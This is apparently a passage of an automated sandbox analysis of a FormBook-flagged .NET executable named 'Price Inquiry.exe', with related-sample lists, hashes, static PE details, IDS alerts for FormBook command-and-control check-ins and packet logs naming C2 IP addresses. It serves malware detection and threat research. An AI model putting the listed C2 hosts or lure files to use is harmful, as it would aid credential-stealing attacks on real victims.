TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUMkdUS1ZSOU9NRVI2WU9PNk1FUzFMRTRBUS4u&sharetoken=hejMJEowqy4fkqmJD9lY	Get hash	malicious	HTMLPhisher	Browse	162.62.150.176
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.62.150.187
	Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html	Get hash	malicious	HTMLPhisher	Browse	162.62.150.176
	SecuriteInfo.com.Win32.TrojanX-gen.16449.26967.exe	Get hash	malicious	Unknown	Browse	101.32.133.53
	SecuriteInfo.com.Win32.MalwareX-gen.14234.12476.exe	Get hash	malicious	Unknown	Browse	101.32.133.53
	SecuriteInfo.com.Win32.TrojanX-gen.17640.30814.exe	Get hash	malicious	Unknown	Browse	101.32.133.53
	SecuriteInfo.com.Win32.MalwareX-gen.14234.12476.exe	Get hash	malicious	Unknown	Browse	101.32.133.53
	SecuriteInfo.com.Win32.TrojanX-gen.16449.26967.exe	Get hash	malicious	Unknown	Browse	101.33.21.91
	SecuriteInfo.com.Win32.TrojanX-gen.17640.30814.exe	Get hash	malicious	Unknown	Browse	101.33.20.140
	SecuriteInfo.com.Win32.Evo-gen.19313.28597.exe	Get hash	malicious	Unknown	Browse	101.33.20.125
GIGABITBANK-AS-APGigabitbankGlobalHK	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	103.144.219.16
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	031215-Revised-01.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	Copy of 01. Bill of Material - 705.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	RCZ-PI-4057.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	APS-0240226.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	payment voucher.exe	Get hash	malicious	FormBook	Browse	45.157.69.194
	LisectAVT_2403002A_21.exe	Get hash	malicious	Orcus	Browse	45.157.69.156

Process:	C:\Users\user\Desktop\Price Inquiry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\q3a81SS

Download File

Process:	C:\Windows\SysWOW64\tzutil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.763080670865514
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Price Inquiry.exe
File size:	779'776 bytes
MD5:	e54162509760c0e8081c8157ec2e8198
SHA1:	87ec04f9de3f20b19e2335852b9ad21355d3a300
SHA256:	a6e3235b896751de88268e16897a971fb6f68c06c63566714fbc70a5f78d4fda
SHA512:	0c912937090c654cfbc2c1493beff5cd0cbe75d899c950800add2aa40efb6c3bc9d6683d6c5c64de8bc611a276debcbc5bad756973e069e8d327ce35ca52a6ba
SSDEEP:	12288:Ccir1S2IoOAc6/5rZGmy4+X5wZno/C7Z9Z09P3Y3IkbDUdsJJRNjjaYVPriAxFuI:5X5w9oeZTpIkkdsJJLlriAeZiy54kJPG
TLSH:	9FF4F1607619AC63D4AA4BF10520E47213F75E9AB561F3CA9CE9BCEB31F77C02211653
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]...............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4bfc12
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE95D05C1 [Sun Jan 24 16:07:29 2094 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbfbc0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x3c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbfba4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbdc18	0xbde00	bf2eb2aebeecc618dece44287434aae1	False	0.8850806451612904	data	7.769889240510903	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x3c0	0x400	df8bb8fffaa995ea330e1ea7e3ae63ef	False	0.3720703125	data	3.047177314543846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	eb299e7b96a27a814a3b86ce3394b870	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc0058	0x364	data			0.4009216589861751

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-15T16:19:17.251670+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49900	194.58.112.174	80	TCP
2024-10-15T16:19:33.440899+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53104	199.59.243.227	80	TCP
2024-10-15T16:19:35.836739+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53112	199.59.243.227	80	TCP
2024-10-15T16:19:38.388556+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53113	199.59.243.227	80	TCP
2024-10-15T16:19:40.922570+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53114	199.59.243.227	80	TCP
2024-10-15T16:19:56.883283+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53117	119.28.49.194	80	TCP
2024-10-15T16:19:59.633181+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53118	119.28.49.194	80	TCP
2024-10-15T16:20:02.180365+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53119	119.28.49.194	80	TCP
2024-10-15T16:20:11.695720+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53120	119.28.49.194	80	TCP
2024-10-15T16:20:17.680674+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53122	96.126.123.244	80	TCP
2024-10-15T16:20:20.258107+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53123	96.126.123.244	80	TCP
2024-10-15T16:20:22.799770+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53124	96.126.123.244	80	TCP
2024-10-15T16:20:25.321453+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53125	96.126.123.244	80	TCP
2024-10-15T16:20:32.133197+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53126	103.144.219.16	80	TCP
2024-10-15T16:20:34.758111+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53127	103.144.219.16	80	TCP
2024-10-15T16:20:37.369164+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53128	103.144.219.16	80	TCP
2024-10-15T16:20:39.869098+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53129	103.144.219.16	80	TCP
2024-10-15T16:20:46.675779+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53130	84.32.84.32	80	TCP
2024-10-15T16:20:49.284079+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53131	84.32.84.32	80	TCP
2024-10-15T16:20:51.755532+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53132	84.32.84.32	80	TCP
2024-10-15T16:20:54.415505+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53133	84.32.84.32	80	TCP
2024-10-15T16:21:00.850643+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53134	47.57.185.227	80	TCP
2024-10-15T16:21:03.087126+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53135	47.57.185.227	80	TCP
2024-10-15T16:21:05.664273+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53136	47.57.185.227	80	TCP
2024-10-15T16:21:08.165031+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53138	47.57.185.227	80	TCP
2024-10-15T16:21:22.906276+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53139	162.0.213.94	80	TCP
2024-10-15T16:21:25.432301+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53140	162.0.213.94	80	TCP
2024-10-15T16:21:28.053692+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53141	162.0.213.94	80	TCP
2024-10-15T16:21:30.560753+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53142	162.0.213.94	80	TCP
2024-10-15T16:21:37.339322+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53143	85.159.66.93	80	TCP
2024-10-15T16:21:39.885023+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53144	85.159.66.93	80	TCP
2024-10-15T16:21:42.431529+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	53145	85.159.66.93	80	TCP
2024-10-15T16:22:44.492301+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	53146	85.159.66.93	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 15, 2024 16:19:16.303186893 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:16.312201977 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:16.312535048 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:16.320403099 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:16.325340033 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251461029 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251497984 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251512051 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251594067 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251605034 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251621962 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251632929 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251645088 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251656055 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.251669884 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:17.251734018 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:17.399300098 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:17.399435043 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:17.401360989 CEST	49900	80	192.168.2.6	194.58.112.174
Oct 15, 2024 16:19:17.406564951 CEST	80	49900	194.58.112.174	192.168.2.6
Oct 15, 2024 16:19:32.654659033 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:32.659702063 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:32.661211967 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:32.671806097 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:32.676817894 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:33.440723896 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:33.440741062 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:33.440757036 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:33.440785885 CEST	80	53104	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:33.440898895 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:33.440927029 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:34.180159092 CEST	53104	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:35.199054003 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:35.206058979 CEST	80	53112	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:35.206206083 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:35.217031002 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:35.222232103 CEST	80	53112	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:35.836648941 CEST	80	53112	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:35.836672068 CEST	80	53112	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:35.836739063 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:35.837320089 CEST	80	53112	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:35.837388992 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:36.727108955 CEST	53112	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:37.746484995 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:37.751988888 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:37.755542040 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:37.767052889 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:37.772217989 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:37.772233009 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:38.388431072 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:38.388487101 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:38.388556004 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:38.390328884 CEST	80	53113	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:38.390434980 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:39.274013042 CEST	53113	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.293921947 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.298926115 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:40.299055099 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.306252003 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.311167955 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:40.922283888 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:40.922312021 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:40.922569990 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.922856092 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:40.922911882 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.925276041 CEST	53114	80	192.168.2.6	199.59.243.227
Oct 15, 2024 16:19:40.930691957 CEST	80	53114	199.59.243.227	192.168.2.6
Oct 15, 2024 16:19:55.351936102 CEST	53117	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:55.356997967 CEST	80	53117	119.28.49.194	192.168.2.6
Oct 15, 2024 16:19:55.357213020 CEST	53117	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:55.367871046 CEST	53117	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:55.372855902 CEST	80	53117	119.28.49.194	192.168.2.6
Oct 15, 2024 16:19:56.883282900 CEST	53117	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:56.934995890 CEST	80	53117	119.28.49.194	192.168.2.6
Oct 15, 2024 16:19:57.901947021 CEST	53118	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:58.104186058 CEST	80	53118	119.28.49.194	192.168.2.6
Oct 15, 2024 16:19:58.104365110 CEST	53118	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:58.116660118 CEST	53118	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:58.121671915 CEST	80	53118	119.28.49.194	192.168.2.6
Oct 15, 2024 16:19:59.633181095 CEST	53118	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:19:59.678831100 CEST	80	53118	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:00.652137041 CEST	53119	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:00.657116890 CEST	80	53119	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:00.657366991 CEST	53119	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:00.668040991 CEST	53119	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:00.672983885 CEST	80	53119	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:00.673161030 CEST	80	53119	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:02.180365086 CEST	53119	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:02.226831913 CEST	80	53119	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:03.199321032 CEST	53120	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:03.204303026 CEST	80	53120	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:03.205218077 CEST	53120	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:03.213372946 CEST	53120	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:03.218297005 CEST	80	53120	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:03.854067087 CEST	80	53117	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:03.856225014 CEST	53117	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:06.606810093 CEST	80	53118	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:06.606889963 CEST	53118	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:09.152823925 CEST	80	53119	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:09.152987957 CEST	53119	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:11.695553064 CEST	80	53120	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:11.695719957 CEST	53120	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:11.696593046 CEST	53120	80	192.168.2.6	119.28.49.194
Oct 15, 2024 16:20:11.702342987 CEST	80	53120	119.28.49.194	192.168.2.6
Oct 15, 2024 16:20:17.025110960 CEST	53122	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:17.030070066 CEST	80	53122	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:17.033181906 CEST	53122	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:17.044009924 CEST	53122	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:17.048986912 CEST	80	53122	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:17.668026924 CEST	80	53122	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:17.675132036 CEST	80	53122	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:17.680674076 CEST	53122	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:18.555461884 CEST	53122	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:19.574219942 CEST	53123	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:19.579206944 CEST	80	53123	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:19.579339981 CEST	53123	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:19.590712070 CEST	53123	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:19.595623016 CEST	80	53123	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:20.243272066 CEST	80	53123	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:20.258048058 CEST	80	53123	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:20.258106947 CEST	53123	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:21.102370977 CEST	53123	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:22.122222900 CEST	53124	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:22.127227068 CEST	80	53124	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:22.127363920 CEST	53124	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:22.150645971 CEST	53124	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:22.155630112 CEST	80	53124	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:22.155721903 CEST	80	53124	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:22.791949034 CEST	80	53124	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:22.799706936 CEST	80	53124	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:22.799770117 CEST	53124	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:23.664484978 CEST	53124	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:24.683506966 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:24.688951969 CEST	80	53125	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:24.689035892 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:24.700927973 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:24.705966949 CEST	80	53125	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:25.319986105 CEST	80	53125	96.126.123.244	192.168.2.6
